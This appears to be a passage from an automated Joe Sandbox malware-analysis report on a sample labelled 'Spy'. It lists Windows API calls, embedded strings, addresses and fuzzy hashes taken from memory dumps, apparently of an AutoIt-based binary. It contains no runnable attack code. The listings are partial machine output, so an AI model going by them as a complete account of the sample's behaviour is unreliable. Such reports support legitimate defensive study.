                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                      • String ID:
                                                      • API String ID: 3215588206-0
                                                      • Opcode ID: 0533ad510c8686291dc82739bb9eb091b6c95e2b3da9bbaa6007c67e6deef583
                                                      • Instruction ID: 39a98a081ee5c3bfced681aa63ec411fe6f876b22c34bf9b8e7c7842d3ebb7af
                                                      • Opcode Fuzzy Hash: 0533ad510c8686291dc82739bb9eb091b6c95e2b3da9bbaa6007c67e6deef583
                                                      • Instruction Fuzzy Hash: DC415470E043196ADB109FB68C49D6EFEF8EF51B50B10452FF619E7290DAB8A500CF91
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ADB17B
                                                      • __swprintf.LIBCMT ref: 00ADB21C
                                                      • _wcscmp.LIBCMT ref: 00ADB22F
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ADB284
                                                      • _wcscmp.LIBCMT ref: 00ADB2C0
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00ADB2F7
                                                      • GetDlgCtrlID.USER32(?), ref: 00ADB349
                                                      • GetWindowRect.USER32(?,?), ref: 00ADB37F
                                                      • GetParent.USER32(?), ref: 00ADB39D
                                                      • ScreenToClient.USER32(00000000), ref: 00ADB3A4
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ADB41E
                                                      • _wcscmp.LIBCMT ref: 00ADB432
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00ADB458
                                                      • _wcscmp.LIBCMT ref: 00ADB46C
                                                        • Part of subcall function 00AA385C: _iswctype.LIBCMT ref: 00AA3864
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: 505625edce6f5863457b02f181bf2262352d60b43d178382755ce15d0de43b7c
                                                      • Instruction ID: cff761f13536394f5fc7f1903391f3ccab17b28ec8df40475093171a9d59b872
                                                      • Opcode Fuzzy Hash: 505625edce6f5863457b02f181bf2262352d60b43d178382755ce15d0de43b7c
                                                      • Instruction Fuzzy Hash: 3AA1BF71224206EFDB14DF24C884BEAB7A8FF44354F11861AF99AC3291DB30E955CBA1
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00ADBAB1
                                                      • _wcscmp.LIBCMT ref: 00ADBAC2
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ADBAEA
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00ADBB07
                                                      • _wcscmp.LIBCMT ref: 00ADBB25
                                                      • _wcsstr.LIBCMT ref: 00ADBB36
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBB6E
                                                      • _wcscmp.LIBCMT ref: 00ADBB7E
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ADBBA5
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBBEE
                                                      • _wcscmp.LIBCMT ref: 00ADBBFE
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00ADBC26
                                                      • GetWindowRect.USER32(00000004,?), ref: 00ADBC8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: bc5afa0a477f2c8201b6e781ea6aff91fb41bb39c70ab4122c692f83f9a05fc8
                                                      • Instruction ID: 51b529b0486d6a12ba6f3113301bdb4dbd66d206577128c922ffda5938632bb8
                                                      • Opcode Fuzzy Hash: bc5afa0a477f2c8201b6e781ea6aff91fb41bb39c70ab4122c692f83f9a05fc8
                                                      • Instruction Fuzzy Hash: A2819E7102420ADFDB00DF14C985FAA77E8FF48354F14856AFD8A8A2A6DB30DD45CB61
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: 04f4dd4c52ef9727e7445669f2bd464def5f8294d7f60b36faec0db7ecd43e0a
                                                      • Instruction ID: 28fbd33f203f3f9cdae0e5b81a3c875ca82f34e6ff75eeddbb0faf15bec36fcd
                                                      • Opcode Fuzzy Hash: 04f4dd4c52ef9727e7445669f2bd464def5f8294d7f60b36faec0db7ecd43e0a
                                                      • Instruction Fuzzy Hash: D831A331A44206E6DF14EBA0CE63EAD73F4AF20790F700526F592711E1EF556E04C562
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00ADCBAA
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ADCBBC
                                                      • SetWindowTextW.USER32(?,?), ref: 00ADCBD3
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ADCBE8
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ADCBEE
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ADCBFE
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ADCC04
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ADCC25
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ADCC3F
                                                      • GetWindowRect.USER32(?,?), ref: 00ADCC48
                                                      • SetWindowTextW.USER32(?,?), ref: 00ADCCB3
                                                      • GetDesktopWindow.USER32 ref: 00ADCCB9
                                                      • GetWindowRect.USER32(00000000), ref: 00ADCCC0
                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ADCD0C
                                                      • GetClientRect.USER32(?,?), ref: 00ADCD19
                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ADCD3E
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ADCD69
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: 618263bac747ad876b100270daac63873609a0a9c91effbc2a8e02668bc6418b
                                                      • Instruction ID: 8d336c001b84c091b881cc34cd0555672313f5568e3585e2b568052a6e22cabe
                                                      • Opcode Fuzzy Hash: 618263bac747ad876b100270daac63873609a0a9c91effbc2a8e02668bc6418b
                                                      • Instruction Fuzzy Hash: 9051603090070AEFDB209FA8CE85BAEBBF5FF44715F404519E686A36A0CB74E954CB50
                                                      APIs
                                                      • _memset.LIBCMT ref: 00B0A87E
                                                      • DestroyWindow.USER32(00000000,?), ref: 00B0A8F8
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B0A972
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B0A994
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0A9A7
                                                      • DestroyWindow.USER32(00000000), ref: 00B0A9C9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A80000,00000000), ref: 00B0AA00
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0AA19
                                                      • GetDesktopWindow.USER32 ref: 00B0AA32
                                                      • GetWindowRect.USER32(00000000), ref: 00B0AA39
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B0AA51
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B0AA69
                                                        • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: 9da8d01087bcd5ee2fb8949a7cc0192d768512cb0ef162ddc26c1047e2000442
                                                      • Instruction ID: 40eb815d86a447cd3541e5ae9b31cb4eb52636e720373f6be0cca46fd3d4705e
                                                      • Opcode Fuzzy Hash: 9da8d01087bcd5ee2fb8949a7cc0192d768512cb0ef162ddc26c1047e2000442
                                                      • Instruction Fuzzy Hash: 21719871254304AFDB21DF28CC49FAA7BE5FB89300F54895DF986872A1DB70AA41CB52
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00B0CCCF
                                                        • Part of subcall function 00B0B1A9: ClientToScreen.USER32(?,?), ref: 00B0B1D2
                                                        • Part of subcall function 00B0B1A9: GetWindowRect.USER32(?,?), ref: 00B0B248
                                                        • Part of subcall function 00B0B1A9: PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CD38
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B0CD43
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B0CD66
                                                      • _wcscat.LIBCMT ref: 00B0CD96
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B0CDAD
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CDC6
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDDD
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDFF
                                                      • DragFinish.SHELL32(?), ref: 00B0CE06
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B0CEF9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: f2df091e325f6b637e10bbeb1bba45bcd42b23a3f68a341df52c70bd31fb9eda
                                                      • Instruction ID: e6d170d50f92e8664a11ae88cff43e8594ebbaf46cc44af7affe0e1ed84d2da3
                                                      • Opcode Fuzzy Hash: f2df091e325f6b637e10bbeb1bba45bcd42b23a3f68a341df52c70bd31fb9eda
                                                      • Instruction Fuzzy Hash: AD615972108301AFC701EF54DC85D9BBFE8EF89750F500A6EF595932A1DB70AA49CB52
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 00AE831A
                                                      • VariantCopy.OLEAUT32(00000000,?), ref: 00AE8323
                                                      • VariantClear.OLEAUT32(00000000), ref: 00AE832F
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AE841D
                                                      • __swprintf.LIBCMT ref: 00AE844D
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00AE8479
                                                      • VariantInit.OLEAUT32(?), ref: 00AE852A
                                                      • SysFreeString.OLEAUT32(?), ref: 00AE85BE
                                                      • VariantClear.OLEAUT32(?), ref: 00AE8618
                                                      • VariantClear.OLEAUT32(?), ref: 00AE8627
                                                      • VariantInit.OLEAUT32(00000000), ref: 00AE8665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 3730832054-3931177956
                                                      • Opcode ID: a81399a47fd8463f77d5f3e0fe5baade96bbd7e879a5b9f2e1f182912f969cd8
                                                      • Instruction ID: 3c38e7e8fa04feac5b2f3c0a8426399f77af2eb9c7ba4dde494eb79b57a30320
                                                      • Opcode Fuzzy Hash: a81399a47fd8463f77d5f3e0fe5baade96bbd7e879a5b9f2e1f182912f969cd8
                                                      • Instruction Fuzzy Hash: C1D1E371604556EBDF20AFA6C894BAEB7B4FF05B00F248555E409AF290DF78EC40DBA1
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00B04A61
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B04AAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: dc74508d38a4936e7863fbfafb4e556f6e9b47f4492ca246f8836f88ac61c1a1
                                                      • Instruction ID: 777f92c8f9cb109fa9700a28dc6388daa6586a727c796ef3957ef47ea404f1a9
                                                      • Opcode Fuzzy Hash: dc74508d38a4936e7863fbfafb4e556f6e9b47f4492ca246f8836f88ac61c1a1
                                                      • Instruction Fuzzy Hash: 92917C752047019FCB14EF20C691A6ABBE1EF98354F10889DF9965B3E2DB31ED49CB81
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA2C2
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AEA2E3
                                                      • __swprintf.LIBCMT ref: 00AEA33C
                                                      • __swprintf.LIBCMT ref: 00AEA355
                                                      • _wprintf.LIBCMT ref: 00AEA3FC
                                                      • _wprintf.LIBCMT ref: 00AEA41A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-3080491070
                                                      • Opcode ID: 51d8e60b76c2ee9eda58a5e00a97195303d947e64fd0ff2b82d5e6588005d82c
                                                      • Instruction ID: 309d70fe4d6502b5399fc343005fe5e7c72fd03a4fd9c5e2b320d13e94422303
                                                      • Opcode Fuzzy Hash: 51d8e60b76c2ee9eda58a5e00a97195303d947e64fd0ff2b82d5e6588005d82c
                                                      • Instruction Fuzzy Hash: BE51A071A4011AAACF14EBE0CE46EEEB7B9AF14340F600165F505B20A2EF752F58DB61
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00ACF8B8,00000001,0000138C,00000001,00000000,00000001,?,00AF3FF9,00000000), ref: 00AE009A
                                                      • LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00A3
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      • GetModuleHandleW.KERNEL32(00000000,00B47310,?,00000FFF,?,?,00ACF8B8,00000001,0000138C,00000001,00000000,00000001,?,00AF3FF9,00000000,00000001), ref: 00AE00C5
                                                      • LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00C8
                                                      • __swprintf.LIBCMT ref: 00AE0118
                                                      • __swprintf.LIBCMT ref: 00AE0129
                                                      • _wprintf.LIBCMT ref: 00AE01D2
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE01E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 984253442-2268648507
                                                      • Opcode ID: 93bd56d9dd4b599c738b1e2b44661fc1ac4738b8e655da5053f60aefb3aa7e52
                                                      • Instruction ID: 7f393948e8eaf700929f18964360d60b43e177602c14ba20d17ef65681e4312b
                                                      • Opcode Fuzzy Hash: 93bd56d9dd4b599c738b1e2b44661fc1ac4738b8e655da5053f60aefb3aa7e52
                                                      • Instruction Fuzzy Hash: 7A415F7294011AAACF14FBE0CE96DEEB7B8AF14341F600165F605B2092EF756F49CB61
                                                      APIs
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • CharLowerBuffW.USER32(?,?), ref: 00AEAA0E
                                                      • GetDriveTypeW.KERNEL32 ref: 00AEAA5B
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAAA3
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAADA
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEAB08
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: 8693ec1d3b1ae90a6feb91778cee2772f03a0b9f8034a192064432dc35310563
                                                      • Instruction ID: feb7284aed6c57bfad79289366bcdc89e37fa44054858af76bce6e8135364957
                                                      • Opcode Fuzzy Hash: 8693ec1d3b1ae90a6feb91778cee2772f03a0b9f8034a192064432dc35310563
                                                      • Instruction Fuzzy Hash: 6B514B712043069FC700EF11CA92D6AB7E4FF98758F50896DF896972A1DB31AD05CB52
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AEA852
                                                      • __swprintf.LIBCMT ref: 00AEA874
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AEA8B1
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AEA8D6
                                                      • _memset.LIBCMT ref: 00AEA8F5
                                                      • _wcsncpy.LIBCMT ref: 00AEA931
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AEA966
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AEA971
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00AEA97A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AEA984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: 278dd66285e8fb19f8ab7963b2850513bc50d001ecfda4648b5a950c7dce7d80
                                                      • Instruction ID: e00840882c301f945e3df0cede45ea05ea0e50739a3133c32825432e12e2e33c
                                                      • Opcode Fuzzy Hash: 278dd66285e8fb19f8ab7963b2850513bc50d001ecfda4648b5a950c7dce7d80
                                                      • Instruction Fuzzy Hash: FB31D27251024AABDB219FA1DC48FEB73BCEF89700F5041B6F508D30A1EB74A7848B25
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B0982C,?,?), ref: 00B0C0C8
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0DF
